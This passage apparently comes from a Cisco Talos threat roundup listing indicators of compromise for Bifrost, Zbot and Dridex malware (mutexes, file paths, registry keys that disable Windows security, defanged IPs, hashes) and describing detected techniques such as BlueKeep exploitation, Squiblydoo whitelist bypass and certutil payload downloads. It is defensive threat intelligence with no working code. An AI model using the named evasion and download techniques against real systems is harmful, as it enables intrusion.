{c6f7747b-6c04-5b4b-1038-fdf3a4b114de} 19
Files and or directories createdOccurrences
%System32%\Tasks\Ryddmbivo 19
%APPDATA%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\euSMS 2
%APPDATA%\Microsoft\Templates\SmartArt Graphics\wRswLnE5 1
%APPDATA%\Microsoft\SystemCertificates\My\CRLs\BrHHj 1
%APPDATA%\Microsoft\SystemCertificates\My\CTLs\POIunUpDiiw 1
%APPDATA%\Microsoft\UProof\K9US2 1
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\2h1C 1
%APPDATA%\Microsoft\Templates\LiveContent\User\PReu8Y 1
%APPDATA%\Microsoft\Templates\LiveContent\Managed\SmartArt Graphics\1033\bdM4bZq 1
%APPDATA%\Microsoft\Windows\Start Menu\kyqlqe3 1
%APPDATA%\Microsoft\Protect\TVr6Axdt4 1
%APPDATA%\Microsoft\Document Building Blocks\1033\pQy 1
%APPDATA%\Microsoft\SystemCertificates\My\CRLs\yhNSoDV 1
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\qt8iBbvaD9N 1
%APPDATA%\Microsoft\Excel\xNClDeKvGX 1
%APPDATA%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\1zucyY69 1
%APPDATA%\Macromedia\Flash Player\macromedia.com\ndVnWH 1
%APPDATA%\Microsoft\Windows\Network Shortcuts\8JBThBOf 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\W7vvpql 1

File Hashes

01ff8188c74308b5694f1f5417b8dc8a2c5ac2fe59b4b10d792273dfd00c40d9
230d68f04b62e617e40c56976ab583c7eeaa20761a36424ff587f62411770bbd
23c5bbe598a60c2814cd72779bc50626d16455ec1197c73f33bfcb8b9bd95bee
3a5d69c3a2b52ad6d2eb5c1471ca4e93fbb17cae1bc33972a67c2aedda09581f
3d91e0a34af694a2c0dcecbf51e9aea69df32acfafa28e778f8136585c188a9b
43edfba88ac4ef39ede058afdd0640c659e3cf939a920c7f45449bf514ecd9cf
4dcf29b7d5c46b1647550492fea89934c0279562875c1c1f5d2a32eadddfef2f
532c4a9fdcc00ccbbde0658accc2d5d76862011038a28136e5c19f312e1cd7a9
6354ac921d32035dcdf9ade95aa7025c517d47e93b1d636b415944ff4de87896
66b88b6a6bbc1178cd69d4730d4e946ac78fd7b7941a7752c269e5526475a48f
7027504d9be13bd47b45742a2035263c69ca96596e19db73d27e0b91bb48086a
7151719b7ecf17a0193a2ae504598f5c2fb64db5ad68812c2a11cf59f392edc2
a5fcac8fa76442c46d1e48e4104a67399e68a03829e3c60aab67c38d152d9025
a969bed6f7448696349028d766d421094510c7759828473a4a3dd8baf7fa37dd
afd7750169a65f560917f45bdad20b3785d3b8ea3bb4e4335d6a978ceec931ad
b85dc997c286d5e1c94c544310837a28f8b7376d5ff40fbf0af80af9cc43cc8f
b8c5142d09851bb8da18953b38041345f177a1ea49f2101da423f3d148a26631
caa4ce651ab88ad9a49b05e59df3065f8488b9051b3195849775dc29e83957b6
d96e5c17c53670a8bf021f3fcf93f4ec0fc66525bfbe3142f4a6397979534edb

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Bifrost-9768974-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
MutexesOccurrences
Bif1234 20
0ok3s 19
Global\<random guid> 5
uygiuhy 1
Files and or directories createdOccurrences
%APPDATA%\addons.dat 19
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp 17
%System32%\Bifrost\msnmngr.exe 11
%System32%\bifrost\server.exe 7
%ProgramFiles%\dell\dll.exe 1

File Hashes

014044854d6020c9db6d48e7b8486449439a93099dc7ca6b08c77cbc37cc9b36
01cd8de48cced53af1973a90fae7b4bc8fb6b3469123cad223cb5bb4f314deca
05bc822e3abb0d52bb2d0a5994bac44008702cbb433cd0f47db87dc7487220a5
067445cf9e876eeef5d2565c5ebabea9e0bd61dacd612bcc1277c705f45534e5
0b5e5b8521844e9b57b4c051db8091a5dcf31dc20edb57d985e486675c29f528
2e06e57e1ef7f22d675e932516c1a9de98d13e0c8b2559dffdf78f07de404375
5c13c2a1d566b0979972f89ce9aaf715e4ca6a33cb22108048f3455ed0d079de
6e026c3936a108c7f807a084e84f8aa671ac9cfe8f6d00050fbf38b29723b572
71a7098854fe637c0fc269f5b03397530e5e6eeac8f364b348f9ce05aa1e7be4
7d271a53df68f1dc6937a6fd1ca9ae6cd05261f2b411bcca019bc741118a09b2
82f6f5a7bc2d8a5f289f042c239afc2240fc4606627542844d5af730d7c24f66
84af638275aa1c9324064d0c787addd462b95c74b00b02c74aef44baff801e16
90563ddf40c0a5e0d403c0b210c1ff80d7dd285456d7f5d02826fc507168052d
91ff6392cdd780b80bf8892d9f36e29d4d0976f378b62d21da12ed0bb03312fd
9a7839ebe87004be96d6ff08fa74b7a7297b1b86bc1b66b267ce440b5d23bc92
a000f2a444b5957fc05704a0c0f2de22d5b01fd25914021eb54e56781d563a0c
a2c4738b274ffad5fcc1e19a3cb567b755c1f699420e3c47f133598d959a8428
b4a1a951e6f42fd8f86df4dc76ab8a59276af598be9391042fe34a8e00ebb968
b91ae2993f51a1622d0648f3dbe3e51cfb0cf104bec1893ceee3e0d5939b6206
baa88c072228039874894caf06a21a911f79153bd227b95f3f6e019576148ffd
bad59dccb676cb40a43cf19cc11f03a1d5f984f9d665d4f7c5df1d678fecd65a
c255bf3121661306c79cd642c8819374e1848252a86b28cf70027ea3100ef567
d7b43408cd35b9901d3907f1cff3b58b7c2a0c458ce0502e7af0df227c4e9691
ddb48749423eee5baaa183d650136e157a323dd508196204b415d14fbb629cb0
ed27f938818b76721be9d3d55bf146c2cb13377699c43d050ee57fa9843a8b6c

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Zbot-9769359-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 75 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusOverride
60
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
60
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallDisableNotify
60
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallOverride
60
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
60
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
60
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
60
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
60
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
60
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
60
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LUAFV
Value Name: Start
60
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE
Value Name: RPSessionInterval
60
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS DEFENDER
Value Name: DisableAntiSpyware
60
<HKCU>\SOFTWARE\MICROSOFT\INSTALLER\PRODUCTS\98BE0FA9BD7E903C000098BD76F2968C 60
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: 98BE0FA9BB7E8E3C000098BD76F2948C
60
<HKCU>\SOFTWARE\MICROSOFT\INSTALLER 60
<HKCU>\SOFTWARE\MICROSOFT\INSTALLER\PRODUCTS 60
<HKCU>\SOFTWARE\MICROSOFT\INSTALLER\PRODUCTS\98BE0FA9BD7E903C000098BD76F2968C 60
MutexesOccurrences
98BE0FA9BB7E8E3C000098BD76F2948C 60
98BE0FA9BC7E8F3C000098BD76F2958C 60
98BE0FA9BCBE8F7C000098BD76F295CC 60
98BE0FA9BD7E903C000098BD76F2968C 60
Global\<random guid> 14
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
103[.]4[.]225[.]41 60
204[.]79[.]197[.]200 19
172[.]217[.]197[.]155 1
172[.]217[.]197[.]100 1
72[.]21[.]81[.]200 1
173[.]194[.]205[.]154 1
173[.]194[.]206[.]95 1
74[.]125[.]192[.]95 1
173[.]194[.]205[.]94 1
172[.]217[.]197[.]93 1
8[.]253[.]45[.]249 1
209[.]85[.]144[.]154 1
13[.]107[.]42[.]14 1
104[.]16[.]53[.]111 1
104[.]18[.]71[.]113 1
13[.]107[.]136[.]9 1
173[.]194[.]175[.]105 1
173[.]194[.]207[.]97 1
8[.]249[.]241[.]254 1
173[.]194[.]207[.]155 1
173[.]194[.]205[.]101 1
128[.]92[.]203[.]42 1
13[.]107[.]136[.]13 1
169[.]47[.]141[.]204 1
99[.]84[.]105[.]15 1

*See JSON for more IOCs

Files and or directories createdOccurrences
%ProgramData%\98BE0FA9BB7E8E3C000098BD76F2948C 60
%ProgramData%\98BE0FA9BB7E8E3C000098BD76F2948C\98BE0FA9BB7E8E3C000098BD76F2948C.exe 60
%ProgramData%\98BE0FA9BB7E8E3C000098BD76F2948C\98BE0FA9BB7E8E3C000098BD76F2948C.ico 60
%ProgramData%\98BE0FA9BB7E8E3C000098BD76F2948C\98BE0FA9BB7E8E3C000098BD76F2948C 60
%APPDATA%\Microsoft\Windows\Start Menu\Programs\System Progressive Protection 60
%APPDATA%\Microsoft\Windows\Start Menu\Programs\System Progressive Protection\System Progressive Protection.lnk 60
%HOMEPATH%\Desktop\System Progressive Protection.lnk 60

File Hashes

0026182491fb2b43a099f0eb348bacf4eaf0d7ae9eb99a194bf19cd0f09a084c
01b275cb46d6f2330c474c3a95d8d8bf7a68788700be0f3f4ac0eb173130e88f
04a0bca8e852b9427305564cfd7379f4f4ef446e02e1175e716c036737012a34
081fbdddada8c1a86a2d35f4e9e40dc2fa354236c880c23fa3d9456f02b6e5e3
09c4156b71f0104f91398d3d18fd5b2630c1c6e66b8afe16fd78d5abdb07bc0a
1372a41318c69a88eb87395b6299117dacc691a36174a50d74e7d3dc92fe122a
143a7a3ff01a2ca3621635c56d75a22a0018c1899a791b8e908d173c866ca9b1
17fa9bfeac7472d467f58544b31d6922c54f7e91df3e884f174b1c2fff3f0bd1
1aa0d9083a029f51c5d96b4a954dec91c626f03a5449c97c12e3048c8f42110a
1dc5847ab25bc85751c44260917acbd93056d6909ad52e98e14904dca578955e
1de85f812a67e5b857d5bd754966c06e281b40634d8bbbc443e6514e213cdd30
20ebd16fd3572afced7f73cdea92155b5301836481256d3bc71d7725771e6251
24b292803c39d5df4e30216562e4128f7d06461aa7dddd1c5b5601061c2f98c3
25720be6833a4aa4773bf038c97c6dfae36cc621a9dd8c4369182194d4ca3de9
2a9b26247bef9a4969b5416f37e4d9bccd2d2ca7ad38f789a20051618b297c07
2b182c3634287cc6121ed8b84dea43092e3b6edf67a1c738328c2412a727e0d0
351c901a32402cbdeb3591af2bc06f94fe2efb197fe7cca6f700e1e711076821
3668ee29a2aa4d4cba05675b39a20863f1f09f95a3cd35ca8b4bd7154421fd45
381a82f9f24023d4d25f3413341acf2b8f5ecef1f5f707257a2bf4766db45cb7
3a3d4c6840f85eda1242726bce33e004f0bf8c29934b1b62c12ebdda90eb256b
3a8dedc59fc47f2c84b4a8eca2efffbba612fe7ca2d8349c0235b4c6de16b25f
3e60cc0326ef48ddd5f39e5fd670836331d3e1c0e685bead48cbbcf1811ed026
430cee71ba89457a3c5faae10eb6e6f60b38e605c0d40620459146f711bb1de7
44050e4d43d1ec77dd2f64d89847ef1bb3afebbb063ffa4bffeb9004a578ae91
463d9573dee3bc5b14d8ccde8a24cecf40ed14726fdabcf23ee88a8c7f0d3640

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Dridex-9768984-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
104[.]23[.]99[.]190 7
104[.]23[.]98[.]190 4
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
pastebin[.]com 11
Files and or directories createdOccurrences
%APPDATA%\Microsoft\Windows\Cookies\0BEYG0U4.txt 11
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp 8
<malware cwd>\old_<malware exe name> (copy) 8

File Hashes

0cd54448b74c09b92d0e7fb8df357735d4799b954a6b31418d188c538ad5bebb
19922bc41beeda207b892f07c9e8310b0543c08d931515a507e73640cf65412b
1e9e5670350ff1247abec11c5423560d76968835532f937f013ec3e8f3191118
32bee6c5ed8fdd2e47658e435e7bb27469e3916e4af77f8ea71aa30cb992ba44
7ebc6bbcf3548edd66877016e026a86172dc29f8997d30078db654eb81616173
98bc09e3271cbaba27d4529572634a4ec88d4c8ba3b57358c020acdfbd281bd0
a317f44df1fa34a55ac8c3bbedbd320ea77f1f5842fe846fb4dfb534abc166eb
d52f2ea52a9af29d7a702ccee9ad4c9c235a08d47bcb834794fc83f4d949967a
e0fc31c1db2e72724bbe333ca51f64579a01eb7aa00705893dd4ddbeb4b484d6
e455b50913f96ac065f314f809fb1e177972c511aecc29c977f0efab9534090a
e75008ed9fc10b497dbbd97e74301e096e5cabf41728af149690ea66780a9082

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


Malware


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Dealply adware detected - (9993)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Process hollowing detected - (9460)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
CVE-2019-0708 detected - (2395)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Excessively long PowerShell command detected - (1703)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Installcore adware detected - (798)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Squiblydoo application whitelist bypass attempt detected. - (785)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
Crystalbit-Apple DLL double hijack detected - (673)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
Kovter injection detected - (620)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Certutil.exe is downloading a file - (429)
The certutil.exe utility has been detected downloading and executing a file. Upon execution, the downloaded file behaved suspiciously. The normal usage of certutil.exe involves retrieving certificate information. Attackers can use this utility to download additional malicious payloads.
XMRig Miner Detected - (206)
Command line options indicating usage of XMRig Miner have been detected. Malware sometimes uses compromised hosts to mine for cryptocurrency on behalf of the attacker.